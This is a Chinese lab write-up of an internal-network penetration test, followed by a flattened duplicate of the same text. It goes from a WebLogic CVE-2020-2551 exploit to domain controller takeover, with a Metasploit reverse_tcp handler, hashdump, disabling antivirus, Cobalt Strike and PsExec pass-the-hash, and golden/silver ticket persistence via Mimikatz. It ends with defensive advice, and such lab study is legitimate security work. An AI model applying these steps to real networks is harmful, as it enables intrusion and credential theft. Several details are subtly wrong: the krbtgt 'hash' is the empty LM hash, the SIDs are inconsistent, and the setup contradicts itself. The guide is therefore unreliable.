记一次内网渗透2
字数 1493 2025-08-23 18:31:34

内网渗透实战教学:从Weblogic漏洞到域控攻陷

环境搭建

实验环境配置

  • 攻击机:Kali Linux
  • 目标网络
    • Windows 2008 Server(提供Web服务)
    • Windows 2012 Server(域控制器DC)
    • Windows 7(PC机)

网络配置

  • PC机(Windows 7) IP: 192.168.111.201
  • Kali攻击机与目标机在同一网段

服务配置

  • Windows 7上启动Weblogic服务

信息收集阶段

端口扫描

使用Nmap进行初步探测:

nmap -sS -sV 目标IP

发现开放端口:

  • 80 (HTTP)
  • 1433 (MSSQL)
  • 3389 (RDP)
  • 7001 (Weblogic管理端口)

Web服务识别

访问Web服务发现Weblogic管理界面,版本可能存在漏洞。

漏洞利用阶段

Weblogic反序列化漏洞(CVE-2020-2551)

  1. 漏洞验证

    • 使用专用工具探测CVE-2020-2551漏洞
    • 确认存在漏洞后尝试命令执行

  2. 初始命令执行

    whoami

    成功返回当前用户权限

  3. 内存马注入

    • 通过漏洞注入内存马
    • 获取初步Webshell

Webshell中转

  1. 使用哥斯拉(Godzilla)的Webshell中转功能
  2. 将Shell转移到Metasploit框架上

内网渗透阶段

Metasploit利用

  1. 建立监听

    use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [kali IP]
set LPORT 4444
exploit

  2. 获取Meterpreter会话

    • 成功获取目标系统Shell
    • 进行进程迁移以避免被检测

  3. 凭证收集

    hashdump

    获取系统本地用户哈希

远程桌面(RDP)利用

  1. 使用获取的凭证尝试RDP登录
  2. 登录后关闭杀毒软件

Cobalt Strike转移

  1. 上传CS的Payload
  2. 将Shell从MSF转移到Cobalt Strike
  3. 开始内网横向移动

域渗透阶段

域信息收集

  1. 使用CS内置功能

    • 扫描内网其他主机
    • 收集开放端口信息
    • 抓取域内凭证

  2. 关键信息

    • 域名称: de1ay
    • 域计算机名称: web.de1ay.com
    • 域SID: S-1-5-21-2756371121-2868759905-3853650604-500

横向移动

  1. 使用PsExec横向移动

    • 利用获取的哈希进行传递哈希攻击
    • 横向移动到其他主机

  2. 域控攻陷

    • 通过抓取的域管理员哈希横向到域控制器
    • 获取域控完全控制权限

权限维持

黄金票据制作

  1. 获取KRBTGT账户哈希

    krbtgt:502:aad3b435b51404eeaad3b435b51404ee

  2. 使用Mimikatz制作黄金票据

    mimikatz # kerberos::golden /admin:Administrator /domain:de1ay /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:aad3b435b51404eeaad3b435b51404ee /ticket:golden.kirbi

白银票据制作

前提条件

  1. 已控制域控并使用域管理员登录或提权至SYSTEM
  2. 目标:访问Windows Server 2003机器

所需信息

  • 域名: de1ay
  • 域SID: S-1-5-21-2756371121-2868759905-3853650604-500
  • 目标服务器名: web.de1ay.com
  • 服务账号NTLM hash: 73805069e2c7227f110772875f1b0e41

攻击流程图总结

  1. 外部渗透 → Weblogic漏洞利用 → 获取Webshell
  2. Webshell中转 → Meterpreter会话
  3. 凭证收集 → RDP登录 → 关闭防护
  4. 转移到Cobalt Strike → 内网探测
  5. 横向移动 → 域控攻陷
  6. 权限维持 → 黄金/白银票据制作

防御建议

  1. Weblogic防护

    • 及时安装安全补丁
    • 限制管理界面访问IP

  2. 内网防护

    • 启用LSA保护
    • 限制PsExec使用
    • 监控异常票据活动

  3. 权限管理

    • 定期更改KRBTGT账户密码
    • 实施最小权限原则

  4. 监控措施

    • 部署EDR解决方案
    • 监控异常哈希传递行为
    • 建立完善的日志审计机制
内网渗透实战教学:从Weblogic漏洞到域控攻陷 环境搭建 实验环境配置 攻击机 :Kali Linux 目标网络 : Windows 2008 Server(提供Web服务) Windows 2012 Server(域控制器DC) Windows 7(PC机) 网络配置 PC机(Windows 7) IP: 192.168.111.201 Kali攻击机与目标机在同一网段 服务配置 Windows 7上启动Weblogic服务 信息收集阶段 端口扫描 使用Nmap进行初步探测: 发现开放端口: 80 (HTTP) 1433 (MSSQL) 3389 (RDP) 7001 (Weblogic管理端口) Web服务识别 访问Web服务发现Weblogic管理界面,版本可能存在漏洞。 漏洞利用阶段 Weblogic反序列化漏洞(CVE-2020-2551) 漏洞验证 : 使用专用工具探测CVE-2020-2551漏洞 确认存在漏洞后尝试命令执行 初始命令执行 : 成功返回当前用户权限 内存马注入 : 通过漏洞注入内存马 获取初步Webshell Webshell中转 使用哥斯拉(Godzilla)的Webshell中转功能 将Shell转移到Metasploit框架上 内网渗透阶段 Metasploit利用 建立监听 : 获取Meterpreter会话 : 成功获取目标系统Shell 进行进程迁移以避免被检测 凭证收集 : 获取系统本地用户哈希 远程桌面(RDP)利用 使用获取的凭证尝试RDP登录 登录后关闭杀毒软件 Cobalt Strike转移 上传CS的Payload 将Shell从MSF转移到Cobalt Strike 开始内网横向移动 域渗透阶段 域信息收集 使用CS内置功能 : 扫描内网其他主机 收集开放端口信息 抓取域内凭证 关键信息 : 域名称: de1ay 域计算机名称: web.de1ay.com 域SID: S-1-5-21-2756371121-2868759905-3853650604-500 横向移动 使用PsExec横向移动 : 利用获取的哈希进行传递哈希攻击 横向移动到其他主机 域控攻陷 : 通过抓取的域管理员哈希横向到域控制器 获取域控完全控制权限 权限维持 黄金票据制作 获取KRBTGT账户哈希 : 使用Mimikatz制作黄金票据 : 白银票据制作 前提条件 : 已控制域控并使用域管理员登录或提权至SYSTEM 目标:访问Windows Server 2003机器 所需信息 : 域名: de1ay 域SID: S-1-5-21-2756371121-2868759905-3853650604-500 目标服务器名: web.de1ay.com 服务账号NTLM hash: 73805069e2c7227f110772875f1b0e41 攻击流程图总结 外部渗透 → Weblogic漏洞利用 → 获取Webshell Webshell中转 → Meterpreter会话 凭证收集 → RDP登录 → 关闭防护 转移到Cobalt Strike → 内网探测 横向移动 → 域控攻陷 权限维持 → 黄金/白银票据制作 防御建议 Weblogic防护 : 及时安装安全补丁 限制管理界面访问IP 内网防护 : 启用LSA保护 限制PsExec使用 监控异常票据活动 权限管理 : 定期更改KRBTGT账户密码 实施最小权限原则 监控措施 : 部署EDR解决方案 监控异常哈希传递行为 建立完善的日志审计机制